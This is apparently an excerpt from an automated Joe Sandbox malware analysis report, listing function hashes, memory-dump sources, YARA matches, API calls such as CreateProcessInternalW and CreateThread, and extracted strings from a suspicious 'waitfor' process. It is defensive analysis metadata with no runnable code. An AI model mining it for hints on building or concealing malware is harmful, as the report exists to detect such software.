                                                                                                                • Instruction ID: 40a357caa876bce63e6d5abd034ff4d334ae43aca5432d5f7b8d7c6c32fb30e5
                                                                                                                • Opcode Fuzzy Hash: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                                                • Instruction Fuzzy Hash: 5090023120140802F1907159440465A00058BD5305F96C125A0026774DCA15DB5977A2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                                                • Instruction ID: 14939f167b7b97de3cf98cb3449565c9c7e56ea35f78308868d7f592f689b348
                                                                                                                • Opcode Fuzzy Hash: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                                                • Instruction Fuzzy Hash: C390023120544842F15071594404A5600158BD4309F56C121A00657B4D9625DE55B662
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                                                • Instruction ID: ac75f257a34c22d4a6171dbf559f225aacfbfdb71b8b9f178c36cad7fe494f79
                                                                                                                • Opcode Fuzzy Hash: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                                                • Instruction Fuzzy Hash: B090023160540802F1607159441475600058BD4305F56C121A0025774D8755DB5576A2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                                                • Instruction ID: ff43bdba3fd9e5af0560bbfcd333e4d786c9f9c0880c4cd5fccf892a08cc290a
                                                                                                                • Opcode Fuzzy Hash: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                                                • Instruction Fuzzy Hash: 2990023160550402F1107159451471610058BD4205F66C521A0425678D8795DA5175A3
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                                                • Instruction ID: d512a95988a22c97c3bb30587de03a456fc8ea7c3ba967406f3121c93ffd84c5
                                                                                                                • Opcode Fuzzy Hash: 26c45d06e8051128ed714482f8f206455158a40f685359e34ea7d15adb0a41c0
                                                                                                                • Instruction Fuzzy Hash: 0190022124545102F160715D44046264005ABE4205F56C131A08156B4D8555D9557222
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 0083412B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 73288cdb54e456943a48c4c3a3d075702e7d57b94dbab1cc51b91f27f45fb4ae
                                                                                                                • Instruction ID: 943a3017a7653799cd02c969bfa8e99d2ca794b40a3b3c09911a3fe8bca898eb
                                                                                                                • Opcode Fuzzy Hash: 73288cdb54e456943a48c4c3a3d075702e7d57b94dbab1cc51b91f27f45fb4ae
                                                                                                                • Instruction Fuzzy Hash: A4318DB1601605BBDB14DFA4D881FEBBBB8FB84700F04852CB619AB241D7706A808BE5
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00824B62
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
• CreateProcessInternalW.KERNELBASE(?,?,?,?,008288AE,00000010,?,?,?,00000044,?,00000010,008288AE,?,?,?), ref: 00839E73
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00819EF5
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00819EF5
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,8D000003,00000007,00000000,00000004,00000000,00824363,000000F4), ref: 00839DC9
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• RtlAllocateHeap.NTDLL(00821FB6,?,00835C6B,00821FB6,00835C4F,00835C6B,?,00821FB6,00835C4F,00001000,?,?,00000000), ref: 00839D7C
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0082891C
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0082891C
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,008222C0,0083858F,00835C4F,00822286), ref: 00828713
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,008222C0,0083858F,00835C4F,00822286), ref: 00828713
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0082139D
Memory Dump Source
• Source File: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, Offset: 00810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_810000_waitfor.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4cf55e9b89eb0e2c2ae4d87946e3eb83340900163d602ffcd0cf79035ae789be
                                                                                                                • Instruction ID: 57df64a5c42254a19fc7cfeb81c6bc5aec495e8fdeadec86496b270deee7fe6a
                                                                                                                • Opcode Fuzzy Hash: 4cf55e9b89eb0e2c2ae4d87946e3eb83340900163d602ffcd0cf79035ae789be
                                                                                                                • Instruction Fuzzy Hash: 9CB09B719015C5C5FB11F760460871779106BD0705F16C171D2070761F4738D5D5F176

Memory Dump Source
• Source File: 00000007.00000002.3815775594.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4ab0000_waitfor.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 409fc8dcf3abf7ef32873b3dec03a0726b5035047e6a603bd247e54bd4a59140
• Instruction ID: 8ebac0df834cb2a0601b41014dfd0da3115c9ad069d5488809598ff719ebce4c
• Opcode Fuzzy Hash: 409fc8dcf3abf7ef32873b3dec03a0726b5035047e6a603bd247e54bd4a59140
• Instruction Fuzzy Hash: 0741D27061CB0D4FE368AF6890816B7B3E6FB49304F50862DD9CAC3653EA70F8468685

Strings
Memory Dump Source
• Source File: 00000007.00000002.3815775594.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4ab0000_waitfor.jbxd
Similarity
• API ID:
• String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
• API String ID: 0-3558027158
• Opcode ID: bda69cb4a40f6241f833dd032af19cb5cbe2f11100c6c74fd23754a12034e4a5
• Instruction ID: 7a8f2cd369b27b7399a6a88eb46b52cb8a96140b09e39db3164335e16fb74d4b
• Opcode Fuzzy Hash: bda69cb4a40f6241f833dd032af19cb5cbe2f11100c6c74fd23754a12034e4a5
• Instruction Fuzzy Hash: D89150F04482948AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89098F85

Strings
Memory Dump Source
• Source File: 00000007.00000002.3815775594.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4ab0000_waitfor.jbxd
Similarity
• API ID:
• String ID: (b~$!!,b$!$&($&"dm$)":>$,?$b$bx~z$c||y$c~{m$m(.$xc}c$xc}m$x~zc${c|d$|t|{
• API String ID: 0-2033398785
• Opcode ID: ed915a729b253be52dddd31216ea8f15aa3280cf58fc5bec8e699274403f6cb0
• Instruction ID: 2f58ef2477e5b09b070f7adf3361f43199ccaf7d0c634b070b8546db8e98bc2d
• Opcode Fuzzy Hash: ed915a729b253be52dddd31216ea8f15aa3280cf58fc5bec8e699274403f6cb0
• Instruction Fuzzy Hash: FB2144B080820CDBCB19CF84E5827DE7B71FF05704F909259E9496E246C7358254CB89

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: a32a763987dd7dd8cc7877ee5afad0d2b09b3c7d692f1c55657e6a693b98ae87
• Instruction ID: 22de4f3df5bf9cc9deb5cab215b5011425ceaee26e1401b045d01fdba9ab4f62
• Opcode Fuzzy Hash: a32a763987dd7dd8cc7877ee5afad0d2b09b3c7d692f1c55657e6a693b98ae87
• Instruction Fuzzy Hash: 5D510AB1B14256BFDB20DFA9C88097EF7B8BB08204710C669E455E7746E274FE018BA0

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 419a2db24aa41b2dc479f4349e8db01359d5fa632ef0e639e5bba46c79fb69e9
• Instruction ID: a71457b1bffb4751888cda59f66cb4077c03f57ffa54d9357fadc8f701a5e5ce
• Opcode Fuzzy Hash: 419a2db24aa41b2dc479f4349e8db01359d5fa632ef0e639e5bba46c79fb69e9
• Instruction Fuzzy Hash: A2510671A0464DAFDB30DE9CC89097FB7F8EF88244B008999F495D3641E6B4FA40CB60

Strings
• Execute=1, xrefs: 04804713
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04804742
• ExecuteOptions, xrefs: 048046A0
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048046FC
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04804655
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04804725
• CLIENT(ntdll): Processing section info %ws..., xrefs: 04804787
Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: dc13de2faff520cad151e05859a78107af40f83a776f165144c78589417e0f32
• Instruction ID: ab6313470633d02c2e18fa4962ecac7549c0efedb0c630b39e0a46002ea2eaa4
• Opcode Fuzzy Hash: dc13de2faff520cad151e05859a78107af40f83a776f165144c78589417e0f32
• Instruction Fuzzy Hash: 0A51167164021EABEF14AAA9DC89BA977B8EF04704F4405ADE605A7390EB70BE458F50

Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction ID: 92ab9a8e4ba637662a36ff7886ed40691e4ad024b1d7116561c6950694aa0936
• Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
• Instruction Fuzzy Hash: C4021471508381AFD345CF18C494A6ABBE5EFC8708F148E2DF98A9B254EB71E945CB42

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: 1d2c29b8b9de64d724dd1a1ebbad4a795d652bcc6124bfdd1da3950eaca96a10
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: 3581E130E252499FDF24CF68C8907FEBBB5AF45360F1A425AE861A7391D734B840CB60

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
• Instruction ID: 9954cbf3bb2ecb198fc97dfec3d1b6d789a2f8a759343377221ef8110f2caaff
• Opcode Fuzzy Hash: aa6566e79a17c7d5e28b420ef2ead60dae3c32246fb0d9a65ea9381993ae3faf
• Instruction Fuzzy Hash: FC215676A0011D9BDB10DFA9C8449BEB7F8EF84784F040656F915D3200E730F901CBA1

Strings
• RTL: Re-Waiting, xrefs: 0480031E
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048002BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048002E7
Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
• Instruction ID: 2dfffca65884f9dec258acf6251fd3bce5982128f2a08f550c6b4cf024587c94
• Opcode Fuzzy Hash: f2b11d7a1b77b64b67efb8c23f15d02fbee42c5bcde58051d99ecaab813151f6
• Instruction Fuzzy Hash: B5E1BD306147419FD725CF28DC84B6AB7E0AB89718F144A5DE9A5CB3E1E774E844CB82

Strings
• RTL: Re-Waiting, xrefs: 04807BAC
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04807B7F
• RTL: Resource at %p, xrefs: 04807B8E
Memory Dump Source
• Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
• Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
• Instruction ID: 57969e09a7a95a9e0b78e4861aed8b9efb63837c2848bdbaca3cb9cfd703ba7e
• Opcode Fuzzy Hash: 2bf7d941e0a98fa692235a4e320067167db3360f36d61a55c4557025b3e9513f
• Instruction Fuzzy Hash: 9E41BD317007029FDB24DE29DC51B6AB7E5EB88714F100A2DF95ADB780DB71F8458B91
                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480728C
                                                                                                                Strings
                                                                                                                • RTL: Re-Waiting, xrefs: 048072C1
                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04807294
                                                                                                                • RTL: Resource at %p, xrefs: 048072A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                • API String ID: 885266447-605551621
                                                                                                                • Opcode ID: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                                                • Instruction ID: 4c962a64e8c1a11d3513c4cc65334912f5eb4c3c1a887a1375b316fd49adbd1c
                                                                                                                • Opcode Fuzzy Hash: 8b29b8747785d36a756b319bc422f7a20ac15de63621c54a9e5651ec4678e07a
                                                                                                                • Instruction Fuzzy Hash: 9F41EF71704216ABD720DE25DC42B66B7A5FB84714F104B1DFA56EB380EB30F8528BD1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$]:%u
                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                • Opcode ID: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                                                • Instruction ID: ae8647bd267320a5a19d1ba1a0846ec3ccbd85b241b9479a6a564110fecd7e70
                                                                                                                • Opcode Fuzzy Hash: 4fb75de46081f82ec2f8db600c379e1df94fc562e7c62f3c8311557325e7f3ae
                                                                                                                • Instruction Fuzzy Hash: 7D31457260061D9FDB20DF2DCC44BAEB7B8EB44754F444995E849E3240EB31BA448B61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3815775594.0000000004AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4ab0000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *'2$!</6$#jf$$4$jf"#
